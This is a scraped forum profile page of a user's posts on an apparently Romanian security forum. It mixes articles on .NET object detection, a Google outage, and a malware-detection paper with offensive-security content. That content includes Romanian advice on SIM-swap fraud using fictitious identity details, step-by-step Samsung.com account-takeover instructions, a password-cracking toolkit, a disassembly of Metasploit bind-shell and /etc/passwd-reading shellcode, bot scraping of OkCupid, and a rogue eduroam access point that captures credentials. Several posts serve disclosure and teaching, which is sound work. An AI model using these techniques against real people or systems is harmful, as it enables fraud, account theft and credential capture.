Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. Da, exact la asta ma gandeam si eu cand mi se stricase cartela. Ca sa para mai "real" puteti lua o cartela de Orange, o zgariati incat sa nu mai mearga si ii puneti sa o schimbe. Dar cred ca varianta mai ok e cea cu pierdutul telefonului deoarece in acest caz "altcineva poate folosi cartela intre timp". PS: Nu va bazati pe asta. Cel putin la Orange, cand iti schimba cartela, TE OBLIGA jegosii sa iti faci un abonament pe 3 luni (sau mai mult) si ai nevoie de buletin pentru asta. Cu alte cuvinte, daca adevaratul posesor vine si se plange s-ar putea sa afle cine i-a facut asta. Incercati si voi sa scapati fara buletin, sa dati niste date fictive. Bine, cu datele astea "fictive" cred ca puteti ajunge la "fals in acte" si puteti avea probleme legale, ganditi-va daca se merita.
  2. Rapid Object Detection in .NET By Huseyin Atasoy, 25 Jan 2014 Introduction The most popular and the fastest implementation of Viola-Jones object detection algorithm is undoubtedly the implementation of OpenCV. But OpenCV requires wrapper classes to be usable with .NET languages and Bitmap objects of .NET have to be converted to IplImage format before it is used with OpenCV. On the other hand, programs that use OpenCV are dependent on all OpenCV libraries and their wrappers. These are not problems when functions of OpenCV are used. But if we need only to detect objects on a Bitmap, it isn't worth to make our programs dependent on all OpenCV libraries and wrappers... I have written a library (HaarCascadeClassifier.dll) that makes object detection possible in .NET without any other library requirement. It is an Open Source project that contains implementation of the Viola-Jones object detection algorithm. The library uses haar cascades generated by OpenCV (XML files) to detect particular objects such as faces. It can be used for object detection purposes or only to understand the algorithm and how parameters affect the result or the speed. Background In fact, my purpose is to share HaarCascadeClassifier.dll and its usage. So I will try to summarize the algorithm. Algorithm of Viola and Jones doesn't use pixels directly to detect objects. It uses rectangular features that are called "haar-like features". These features can be represented using 2, 3, or 4 rectangles. Articol: http://www.codeproject.com/Articles/436521/Rapid-Object-Detection-in-NET
  3. [h=3]Today’s outage for several Google services[/h]Earlier today, most Google users who use logged-in services like Gmail, Google+, Calendar and Documents found they were unable to access those services for approximately 25 minutes. For about 10 percent of users, the problem persisted for as much as 30 minutes longer. Whether the effect was brief or lasted the better part of an hour, please accept our apologies—we strive to make all of Google’s services available and fast for you, all the time, and we missed the mark today. The issue has been resolved, and we’re now focused on correcting the bug that caused the outage, as well as putting more checks and monitors in place to ensure that this kind of problem doesn’t happen again. If you’re interested in the technical explanation for what occurred and how it was fixed, read on. At 10:55 a.m. PST this morning, an internal system that generates configurations—essentially, information that tells other systems how to behave—encountered a software bug and generated an incorrect configuration. The incorrect configuration was sent to live services over the next 15 minutes, caused users’ requests for their data to be ignored, and those services, in turn, generated errors. Users began seeing these errors on affected services at 11:02 a.m., and at that time our internal monitoring alerted Google’s Site Reliability Team. Engineers were still debugging 12 minutes later when the same system, having automatically cleared the original error, generated a new correct configuration at 11:14 a.m. and began sending it; errors subsided rapidly starting at this time. By 11:30 a.m. the correct configuration was live everywhere and almost all users’ service was restored. With services once again working normally, our work is now focused on (a) removing the source of failure that caused today’s outage, and ( speeding up recovery when a problem does occur. We'll be taking the following steps in the next few days: 1. Correcting the bug in the configuration generator to prevent recurrence, and auditing all other critical configuration generation systems to ensure they do not contain a similar bug. 2. Adding additional input validation checks for configurations, so that a bad configuration generated in the future will not result in service disruption. 3. Adding additional targeted monitoring to more quickly detect and diagnose the cause of service failure. Posted by Ben Treynor, VP Engineering Sursa: Official Blog: Today’s outage for several Google services
  4. [h=1]Compiling C# Code at Runtime[/h]By Lumír L? Kojecký, 25 Jan 2014 [h=2]Introduction[/h] Sometimes, it is very useful to compile code at runtime. Personally, I use this feature mostly in these two cases: Simple web tutorials – writing a small piece of code into TextBox control and its execution instead of the necessity to own or to run some IDE. User-defined functions – I have written an application for symbolic regression with simple configuration file where user can choose some of my predefined functions (sin, cos, etc.). The user can also simply write his own mathematical expression with basic knowledge of C# language. If you want to use this feature, you don’t have to install any third-party libraries. All functionality is provided by the .NET Framework in Microsoft.CSharp and System.CodeCom.Compiler namespaces. Articol: http://www.codeproject.com/Tips/715891/Compiling-Csharp-Code-at-Runtime
  5. Samsung.com Account Takeover Vulnerability Write-up First of all let me say this: Hurray! They fixed it! After contacting Samsung multiply times I thought they’d completely blown me off in fixing this bug but it looks patched (hopefully!). EDIT: Samsung contacted me and said thanks for the report of the vulnerability. They seemed sincerely interested in fixing the problem – quite the opposite of my initial impression with them (their initial impression of me must’ve been odd considering I’m pretty sick with a cold at the time of this writing). The Vulnerability All Samsung.com accounts can be taken over due to an issue with character removal after authentication. When you register at New URL you can add extra spaces to the end of your account name and it will be registered as a separate account altogether. Alone this is not a big issue (other than perhaps spamming an email address by making multiple accounts with additional spaces after them). However, upon navigating to a Samsung subdomain such as Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators these trailing spaces are scrubbed from your username. Once this happens and you navigate back to Samsung.com you are authenticated as just a regular email address without any trailing spaces – effectively taking over your target’s account. So if your username was originally “admin@samsung.com<SPACE><SPACE>”, after visiting Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators it would be scrubbed to “admin@samsung.com”. Apparently scrubbing isn’t always a good thing (the security puns don’t get worse than that!) More Detailed instructions (Now patched, at least for shop.us.samsung.com): 1. Register an account at Samsung.com with the email address of a target, use Tamper Data or another HTTP intercept tool and add trailing spaces to the username. 2. Complete the account registration process 3. Navigate to “shop.us.samsung.com”, ex: http://shop.us.samsung.com/store?Action=DisplayCustomerServiceOrderSearchPage&Locale-en_US&SiteID=samsung 4. Navigate back to the main Samsung.com domain, ex: Galaxy Note 10.1- 2014 Edition 5. Proceed to attempt to add items to your cart and go to checkout page 6. Notice the account details and cards on file are those of your target Sadly because this isn’t a Samsung TV there is no bug bounty for this exploit, but oh well. Proof of Concept Video Sursa: Samsung.com Account Takeover Vulnerability Write-up | The Hacker Blog
  6. [h=2]PACK – Password Analysis & Cracking Kit[/h] PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers. Before using the PACK, you must establish a selection criteria of password lists. Since we are looking to analyze the way people create their passwords, we must obtain as large of a sample of leaked passwords as possible. One such excellent list is based on RockYou.com compromise. This list both provides large and diverse enough collection that provides a good results for common passwords used by similar sites (e.g. social networking). The analysis obtained from this list may not work for organizations with specific password policies. As such, selecting sample input should be as close to your target as possible. In addition, try to avoid obtaining lists based on already cracked passwords as it will generate statistics bias of rules and masks used by individual(s) cracking the list and not actual users. Please note this tool does not, and is not created to, crack passwords – it just aids the analysis of passwords sets so you can focus your cracking more accurately/efficiently/effectively. You can download PACK here: PACK-0.0.4.tar.gz Or read more here. Sursa: PACK - Password Analysis & Cracking Kit - Darknet - The Darkside
  7. MARD: A Framework for Metamorphic Malware Analysis and Real-Time Detection Shahid Alam Department of Computer Science University of Victoria, BC, V8P5C2 E-mail: salam@cs.uvic.ca November 11, 2013 Introduction and Motivation End point security is often the last defense against a security threat. An end point can be a desktop, a server, a laptop, a kiosk or a mobile device that connects to a network (Internet). Recent statistics by the ITU (International Telecommunications Union) [40] show that the number of Internet users (i.e: people connecting to the Internet using these end points) in the world have increased from 20% in 2006 to 35% (almost 2 billion in total) in 2011. A study carried out by Symantec about the impacts of cybercrime reports, that worldwide losses due to malware attacks and phishing between July 2011 and July 2012 were $110 billion [26]. According to the 2011 Symantec Internet security threat report [25] there was an 81% increase in the malware attacks over 2010, and 403 million new malware were created a 41% increase over 2010. In 2012 there was a 42% increase in the malware attacks over 2011. Web-based attacks increased by 30 percent in 2012. With these increases and the anticipated future increases, these end points pose a new security challenge [56] to the security professionals and researchers in industry and in academia, to devise new methods and techniques for malware detection and protection. There are numerous denitions in the literature of a malware, also called a malicious code that includes viruses, worms, spywares and trojans. Here I am going to use one of the earliest denitions by Gary McGraw and Greg Morrisett [49]: Malicious code is any code added, changed, or removed from a software system in order to intentionally cause harm or subvert the intended function of the system. A malware carries out activities such as: setting up a back door for a bot, setting up a keyboard logger and stealing personal information etc. Antimalware software detects and neutralizes the eects of a malware. There are two basic detection techniques [39]: anomaly-based and signature-based. Anomaly-based detection technique uses the knowledge of the behavior of a normal program to decide if the program under inspection is malicious or not. Signature-based detection technique uses the characteristics of a malicious program to decide if the program under inspection is malicious or not. Each of the techniques can be performed statically (before the program executes), dynamically (during or after the program execution) or both statically and dynamically (hybrid). Download: http://webhome.cs.uvic.ca/~salam/PhD/TR-MARD.pdf
  8. Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I choosed the linux/x86/exec shellcode as first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx 00000005 66682D63 push word 0x632d 00000009 89E7 mov edi,esp 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp 00000017 52 push edx 00000018 E803000000 call dword 0x20 0000001D 6C insb 0000001E 7300 jnc 0x20 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 I will now comment the relevant lines of the shellcode. 00000000 6A0B push byte +0xb 00000002 58 pop eax EAX is set to 0xb = 11. This is the number for execve: $ grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_execve 11 ... SNIP ... 00000003 99 cdq 00000004 52 push edx Set edx to zero and push it in the stack for termination. 00000005 66682D63 push word 0x632d This pushes “-c” on the stack. 00000009 89E7 mov edi,esp Move the stackpointer to EDI. So EDI is pointing to “-c”. 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp Push /bin/sh to the stack and move the stackpointer to EBX. EBX is pointing to “/bin/sh”. It can be seen, that the ls command is not executed directly. A shell is called with the -c option. From the bash man page: “-c string If the -c option is present, then commands are read from string. If there are arguments after the string, they are assigned to the positional parameters, starting with $0.” 00000017 52 push edx Push some zeros again. 00000018 E803000000 call dword 0x20 This one jumps to 0×20. 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 EDI (-c), EBX (/bin/sh) and are pushed on the stack, ECX is moved to ESP and the function is called. Now here comes the interesting part. It is not possible to get the command “ls” from debugging with gdb nor analyzing it with libemu. But the ls (as hex: 6c 73) command is in the code. 0000001D 6C insb 0000001E 7300 jnc 0x20 I think that the ls is pushed on the stack too, although the debugger does not notice anything of that… hmpf. So maybe libemu can help us here. For analyzing the shellcode with libemu I use: $ msfpayload linux/x86/exec cmd="ls" R | sctest -vvv -Ss 100000 -G Exec.dot The ls command should be executed. The output is showing exactly how the execve call is build. ... SNIP ... [emu 0x0x8f3e088 debug ] Flags: int execve ( const char * dateiname = 0x00416fc0 => = "/bin/sh"; const char * argv[] = [ = 0x00416fb0 => = 0x00416fc0 => = "/bin/sh"; = 0x00416fb4 => = 0x00416fc8 => = "-c"; = 0x00416fb8 => = 0x0041701d => = "ls"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... Here it can be seen, that the “ls” command is on the stack too. From the Exec.dot file a diagram can be made for illustrating the programm execution. dot Exec.dot -Tpng -o Exec.dot.png Exec.dot That was it for the first shellcode. linux/x86/shell_bind_tcp For the second shellcode to analyze I choosed linux/x86/shell_bind_tcp. Disassembling works as follows: $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | ndisasm -u - 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 And here is the output from the libemu analysis. $ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | sctest -vvv -Ss 100000 -G shell_bind_tcp.dot ... SNIP ... int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; int listen ( int s = 14; int backlog = 0; ) = 0; int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; int dup2 ( int oldfd = 19; int newfd = 14; ) = 14; int dup2 ( int oldfd = 19; int newfd = 13; ) = 13; int dup2 ( int oldfd = 19; int newfd = 12; ) = 12; int dup2 ( int oldfd = 19; int newfd = 11; ) = 11; int dup2 ( int oldfd = 19; int newfd = 10; ) = 10; int dup2 ( int oldfd = 19; int newfd = 9; ) = 9; int dup2 ( int oldfd = 19; int newfd = 8; ) = 8; int dup2 ( int oldfd = 19; int newfd = 7; ) = 7; int dup2 ( int oldfd = 19; int newfd = 6; ) = 6; int dup2 ( int oldfd = 19; int newfd = 5; ) = 5; int dup2 ( int oldfd = 19; int newfd = 4; ) = 4; int dup2 ( int oldfd = 19; int newfd = 3; ) = 3; int dup2 ( int oldfd = 19; int newfd = 2; ) = 2; int dup2 ( int oldfd = 19; int newfd = 1; ) = 1; int dup2 ( int oldfd = 19; int newfd = 0; ) = 0; int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; ... SNIP ... I analyze the relevant parts of the shellcode, I will use both, the disassembly and the libemu output for further explanation. 00000000 31DB xor ebx,ebx 00000002 F7E3 mul ebx 00000004 53 push ebx 00000005 43 inc ebx 00000006 53 push ebx 00000007 6A02 push byte +0x2 00000009 89E1 mov ecx,esp 0000000B B066 mov al,0x66 0000000D CD80 int 0x80 First the EBX and the EAX registers are filled with zeros. EBX is pushed on the stack, then EBX is set to one and again pushed on the stack. After this two is pushed on the stack. After this the stack address is set to ECX, and EAX is 66. This is the syscall (102) for the socketcall function, which is called afterward. In this case the socket() functions is executed. The rorresponding libemu output: int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14; 0000000F 5B pop ebx 00000010 5E pop esi 00000011 52 push edx 00000012 680200115C push dword 0x5c110002 00000017 6A10 push byte +0x10 00000019 51 push ecx 0000001A 50 push eax 0000001B 89E1 mov ecx,esp 0000001D 6A66 push byte +0x66 0000001F 58 pop eax 00000020 CD80 int 0x80 To shorten things a little, this part calls the bind function (which is EAX syscall 102 and EBX 1 = SYS_SOCKET = socket() ). This correspondence with the libemu output (the whole output can be seen below). int bind ( int sockfd = 14; struct sockaddr_in * my_addr = 0x00416fc2 => struct = { short sin_family = 2; unsigned short sin_port = 23569 (port=4444); struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); }; char sin_zero = " "; }; int addrlen = 16; ) = 0; 5c11 is port 4444 btw. 00000022 894104 mov [ecx+0x4],eax 00000025 B304 mov bl,0x4 00000027 B066 mov al,0x66 00000029 CD80 int 0x80 Here EAX = ffffff66 and EBX = 4, this is defining the listen() function. $ less /usr/include/linux/net.h | grep 4 #define SYS_LISTEN 4 /* sys_listen(2) */ Here is the libemu output: int listen ( int s = 14; int backlog = 0; ) = 0; 0000002B 43 inc ebx 0000002C B066 mov al,0x66 0000002E CD80 int 0x80 EBX is now 5, which defines the accept function… int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19; 00000030 93 xchg eax,ebx 00000031 59 pop ecx 00000032 6A3F push byte +0x3f 00000034 58 pop eax 00000035 CD80 int 0x80 00000037 49 dec ecx 00000038 79F8 jns 0x32 EAX = 3f = 63, this is the syscall for dup2. $ grep 63 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_dup2 63 This procedure is repeated until ECX=0, so we have any descriptor included. 0000003A 682F2F7368 push dword 0x68732f2f 0000003F 682F62696E push dword 0x6e69622f 00000044 89E3 mov ebx,esp 00000046 50 push eax 00000047 53 push ebx 00000048 89E1 mov ecx,esp 0000004A B00B mov al,0xb 0000004C CD80 int 0x80 Finally we have the execve call. This works pretty much as in the analysis of the linux/x86/exec shellcode. int execve ( const char * dateiname = 0x00416fb2 => = "/bin//sh"; const char * argv[] = [ = 0x00416faa => = 0x00416fb2 => = "/bin//sh"; = 0x00000000 => none; ]; const char * envp[] = 0x00000000 => none; ) = 0; I also used the debugger for analyzing the shellcode, but I think the output there is no more help. And finally the flowchart. $ dot shell_bind_tcp.dot -Tpng -o shell_bind_tcp.dot.png shell_bind_tcp.dot So that was it for the second analysis. linux/x86/read_file So let us start by disassembling the shellcode: $ sudo msfpayload linux/x86/read_file PATH="/etc/passwd" R | ndisasm -u - 00000000 EB36 jmp short 0x38 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Libemu and sctest did not work for me. So I will only look at the disassembly and debugging. First things first: The shellcode is using the JMP-CALL-POP technique. This can be seen very good by stepping throught the code but also by having a look at the disassembled code. 00000000 EB36 jmp short 0x38 Jump to address 0×38. 00000038 E8C5FFFFFF call dword 0x2 0000003D 2F das 0000003E 657463 gs jz 0xa4 00000041 2F das 00000042 7061 jo 0xa5 00000044 7373 jnc 0xb9 00000046 7764 ja 0xac 00000048 00 db 0x00 Call 0×2. Be aware 3D – 48 is a data section. Here is nothing else as the path: /etc/passwd. 00000002 B805000000 mov eax,0x5 00000007 5B pop ebx 00000008 31C9 xor ecx,ecx 0000000A CD80 int 0x80 Move 5 to EAX for syscall 5, which is open(). Point EBX to /etc/passwd, and execute. Return the file descriptor to EAX, for example 3. 0000000C 89C3 mov ebx,eax 0000000E B803000000 mov eax,0x3 00000013 89E7 mov edi,esp 00000015 89F9 mov ecx,edi 00000017 BA00100000 mov edx,0x1000 0000001C CD80 int 0x80 Here the syscall for read() is executed. For this, EAX and EBX are set to 3. EBX contains the file descriptor, ECX points EDI. EDX which presents the size is set to 1000. 0000001E 89C2 mov edx,eax 00000020 B804000000 mov eax,0x4 00000025 BB01000000 mov ebx,0x1 0000002A CD80 int 0x80 So finally the result is written (syscall 4 is write()) to the standart output. 0000002C B801000000 mov eax,0x1 00000031 BB00000000 mov ebx,0x0 00000036 CD80 int 0x80 And exit. So that was it for the last analysis. This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: Assembly Language and Shellcoding on Linux
  9. How a Math Genius Hacked OkCupid to Find True Love By Kevin Poulsen 01.21.14 6:30 AM Mathematician Chris McKinlay hacked OKCupid to find the girl of his dreams. Emily Shur Chris McKinlay was folded into a cramped fifth-floor cubicle in UCLA’s math sciences building, lit by a single bulb and the glow from his monitor. It was 3 in the morn*ing, the optimal time to squeeze cycles out of the supercomputer in Colorado that he was using for his PhD dissertation. (The subject: large-scale data processing and parallel numerical methods.) While the computer chugged, he clicked open a second window to check his OkCupid inbox. McKinlay, a lanky 35-year-old with tousled hair, was one of about 40 million Americans looking for romance through websites like Match.com, J-Date, and e-Harmony, and he’d been searching in vain since his last breakup nine months earlier. He’d sent dozens of cutesy introductory messages to women touted as potential matches by OkCupid’s algorithms. Most were ignored; he’d gone on a total of six first dates. On that early morning in June 2012, his compiler crunching out machine code in one window, his forlorn dating profile sitting idle in the other, it dawned on him that he was doing it wrong. He’d been approaching online matchmaking like any other user. Instead, he realized, he should be dating like a mathematician. OkCupid was founded by Harvard math majors in 2004, and it first caught daters’ attention because of its computational approach to matchmaking. Members answer droves of multiple-choice survey questions on everything from politics, religion, and family to love, sex, and smartphones. On average, respondents select 350 questions from a pool of thousands—“Which of the following is most likely to draw you to a movie?” or “How important is religion/God in your life?” For each, the user records an answer, specifies which responses they’d find acceptable in a mate, and rates how important the question is to them on a five-point scale from “irrelevant” to “mandatory.” OkCupid’s matching engine uses that data to calculate a couple’s compatibility. The closer to 100 percent—mathematical soul mate—the better. But mathematically, McKinlay’s compatibility with women in Los Angeles was abysmal. OkCupid’s algorithms use only the questions that both potential matches decide to answer, and the match questions McKinlay had chosen—more or less at random—had proven unpopular. When he scrolled through his matches, fewer than 100 women would appear above the 90 percent compatibility mark. And that was in a city containing some 2 million women (approximately 80,000 of them on OkCupid). On a site where compatibility equals visibility, he was practically a ghost. He realized he’d have to boost that number. If, through statistical sampling, McKinlay could ascertain which questions mattered to the kind of women he liked, he could construct a new profile that honestly answered those questions and ignored the rest. He could match every woman in LA who might be right for him, and none that weren’t. Chris McKinlay used Python scripts to riffle through hundreds of OkCupid survey questions. He then sorted female daters into seven clusters, like “Diverse” and “Mindful,” each with distinct characteristics. Maurico Alejo Even for a mathematician, McKinlay is unusual. Raised in a Boston suburb, he graduated from Middlebury College in 2001 with a degree in Chinese. In August of that year he took a part-time job in New York translating Chinese into English for a company on the 91st floor of the north tower of the World Trade Center. The towers fell five weeks later. (McKinlay wasn’t due at the office until 2 o’clock that day. He was asleep when the first plane hit the north tower at 8:46 am.) “After that I asked myself what I really wanted to be doing,” he says. A friend at Columbia recruited him into an offshoot of MIT’s famed professional blackjack team, and he spent the next few years bouncing between New York and Las Vegas, counting cards and earning up to $60,000 a year. The experience kindled his interest in applied math, ultimately inspiring him to earn a master’s and then a PhD in the field. “They were capable of using mathema*tics in lots of different situations,” he says. “They could see some new game—like Three Card Pai Gow Poker—then go home, write some code, and come up with a strategy to beat it.” Now he’d do the same for love. First he’d need data. While his dissertation work continued to run on the side, he set up 12 fake OkCupid accounts and wrote a Python script to manage them. The script would search his target demographic (heterosexual and bisexual women between the ages of 25 and 45), visit their pages, and scrape their profiles for every scrap of available information: ethnicity, height, smoker or nonsmoker, astrological sign—“all that crap,” he says. To find the survey answers, he had to do a bit of extra sleuthing. OkCupid lets users see the responses of others, but only to questions they’ve answered themselves. McKinlay set up his bots to simply answer each question randomly—he wasn’t using the dummy profiles to attract any of the women, so the answers didn’t mat*ter—then scooped the women’s answers into a database. McKinlay watched with satisfaction as his bots purred along. Then, after about a thousand profiles were collected, he hit his first roadblock. OkCupid has a system in place to prevent exactly this kind of data harvesting: It can spot rapid-fire use easily. One by one, his bots started getting banned. He would have to train them to act human. He turned to his friend Sam Torrisi, a neuroscientist who’d recently taught McKinlay music theory in exchange for advanced math lessons. Torrisi was also on OkCupid, and he agreed to install spyware on his computer to monitor his use of the site. With the data in hand, McKinlay programmed his bots to simulate Torrisi’s click-rates and typing speed. He brought in a second computer from home and plugged it into the math department’s broadband line so it could run uninterrupted 24 hours a day. After three weeks he’d harvested 6 million questions and answers from 20,000 women all over the country. McKinlay’s dissertation was relegated to a side project as he dove into the data. He was already sleeping in his cubicle most nights. Now he gave up his apartment entirely and moved into the dingy beige cell, laying a thin mattress across his desk when it was time to sleep. For McKinlay’s plan to work, he’d have to find a pattern in the survey data—a way to roughly group the women according to their similarities. The breakthrough came when he coded up a modified Bell Labs algorithm called K-Modes. First used in 1998 to analyze diseased soybean crops, it takes categorical data and clumps it like the colored wax swimming in a Lava Lamp. With some fine-tuning he could adjust the viscosity of the results, thinning it into a slick or coagulating it into a single, solid glob. He played with the dial and found a natural resting point where the 20,000 women clumped into seven statistically distinct clusters based on their questions and answers. “I was ecstatic,” he says. “That was the high point of June.” He retasked his bots to gather another sample: 5,000 women in Los Angeles and San Francisco who’d logged on to OkCupid in the past month. Another pass through K-Modes confirmed that they clustered in a similar way. His statistical sampling had worked. Now he just had to decide which cluster best suited him. He checked out some profiles from each. One cluster was too young, two were too old, another was too Christian. But he lingered over a cluster dominated by women in their mid-twenties who looked like indie types, musicians and artists. This was the golden cluster. The haystack in which he’d find his needle. Somewhere within, he’d find true love. Actually, a neighboring cluster looked pretty cool too—slightly older women who held professional creative jobs, like editors and designers. He decided to go for both. He’d set up two profiles and optimize one for the A group and one for the B group. He text-mined the two clusters to learn what interested them; teaching turned out to be a popular topic, so he wrote a bio that emphasized his work as a math professor. The important part, though, would be the survey. He picked out the 500 questions that were most popular with both clusters. He’d already decided he would fill out his answers honestly—he didn’t want to build his future relationship on a foundation of computer-generated lies. But he’d let his computer figure out how much importance to assign each question, using a machine-learning algorithm called adaptive boosting to derive the best weightings. Sursa: How a Math Genius Hacked OkCupid to Find True Love - Wired Science
  10. eduroam WiFi security audit or why it is broken by design Over Christmas I got a TP-Link TL-WN722N USB WiFi device which is supported by hostapd and finally I could test what I always wanted to test: eduroam. But first, what is eduroam? Eduroam is a WiFi network located at universities around the world with the goal to provide internet access to students and university staff on every university that supports eduroam ( https://en.wikipedia.org/wiki/Eduroam ). This means I can connect to the internet with eduroam at a university in France with my user credentials from my university in Germany. Sounds good, but how does it work? Well, the WiFi network uses WPA-Enterprise, which means you connect to an access point and the access point uses an radius server to authenticate you. Generally not a bad idea. But my tests have shown that the eduroam network is broken by design. In advance First things first. Some of my notes that I took from my tests can be seen here. I will provide them as a "POC||GTFO". But I stripped them to not provide a step by step tutorial in "how to pwn eduroam". The set-up I configured a VM with Debian Wheezy with an installation of hostapd. I never had configured a radiusd and wondered how I can get the user credentials if a client device would authenticate to my rogue access point. Well, I found this cool project https://github.com/brad-anton/freeradius-wpe.git. This does everything for me and I do not have to patch the radiusd myself. But honestly, I do not trust this modified radiusd entirely and after I configured everything I turned of the network interface of the VM which provides an internet connection to prevent the radiusd from leaking something of my tests to the internet. Test without a certificate modification On my first test I just set everything up and started it. I started wpa_supplicant on my laptop and it does not connect to the rogue access point because the certificate is wrong. Ok, but what with my Android device. I activated the WiFi on my mobile phone and ... WTF I am connected to the rogue access point. In the log file of the rogue access point I can read my user credentials in PLAINTEXT. Ok, that is not good. But what went wrong? The certificate used by the rogue access point is still invalid. The configuration on my Android device is completly flawed. I configured my Android device like the tutorial on my universities website said. The tutorial said that I do not have to configure any CA and use PAP for the phase2 of the WPA-Enterprise authentication. Now you can say "Idiot, everyone can see that this is wrong!". But to my defense, I always thought that Android then uses its own installed CAs to check if the certificate of the access point is valid. Hell, even the network-manager on ubuntu warns you if you give no CA in the settings. And I used PAP (I knew it sends the user credentials in cleartext) because I thought of the tutorials of my university that eduroam does only support PAP for the phase2 authentication. But both thoughts were wrong. After I installed the "Deutsche_Telekom_Root_CA_2" CA on my Android device and used it in the WiFi configuration it no longer connects to the rogue access point. Also, when the wpa_supplicant configuration misses this line: ca_cert="/etc/ssl/certs/Deutsche_Telekom_Root_CA_2.pem" it also ignores the invalid certificate of the access point and just connects to it. I wrote the helpdesk of my university about the wrong tutorial for using eduroam on Android devices. The helpdesk replied to me that they knew this problem with the CA but Android is not able to verify the certificate of the access point. This is obviously wrong. And the funny thing about this is, they used screenshots in their tutorial to make it easier for everyone to configure eduroam on Android devices. And on these screenshots you can see the "CA certificate" option which is just ignored. Also their reply told me some other interesting things about eduroam, which I checked in my next tests. As a summary for my first test: always configure the CA for eduroam (and in general for all WPA-Enterprise WiFi networks) and always use MSCHAPv2 instead of PAP. Even if your device connects to a rogue access point the adversary only gets challenge-response values and has to brute-force this. When your password is strong enough, the adversary can not use your credentials (at least he has to spend time brute-forcing MSCHAPv2 ...). Test with an own certificate In the eMail reply of the helpdesk of my university they wrote me that when the user added the CA to his WiFi settings, this would destroy the idea behind eduroam (to be able to connect to every eduroam access point in the world). First, I wondered about the "destroy the idea behind eduroam" part but then I thought "They would not be so stupid, would they?". I always thought that they agreed to use the "Deutsche_Telekom_Root_CA_2" CA for eduroam. But this is not the case. A friend of mine was in Belgium and had to change the configured CA in his WiFi settings to connect to eduroam there. I searched through some websites for eduroam tutorials of universities of other countries than Germany and they all used different CAs. Normally, the access point is configured to use a specific radius server which will send the certificate to the client (I do not know if it is even possible to use WPA-Enterprise in any other way). This means that by not agreeing on one CA for the entire eduroam infrastructure, the user has to NOT configure any CA in his WiFi settings to be able to use eduroam in the way it was intended to. And with this, we have the first reason for eduroam being insecure by design. The eMail also stated that even if the user added the CA to his WiFi configuration, this would not help. An adversary could get a certificate signed by the CA and could therefore set up a rouge access point. This statement is true. But this holds for every public key infrastructure. For HTTPS for example a CA should not sign my certificate for "gmail.com" (unless I can 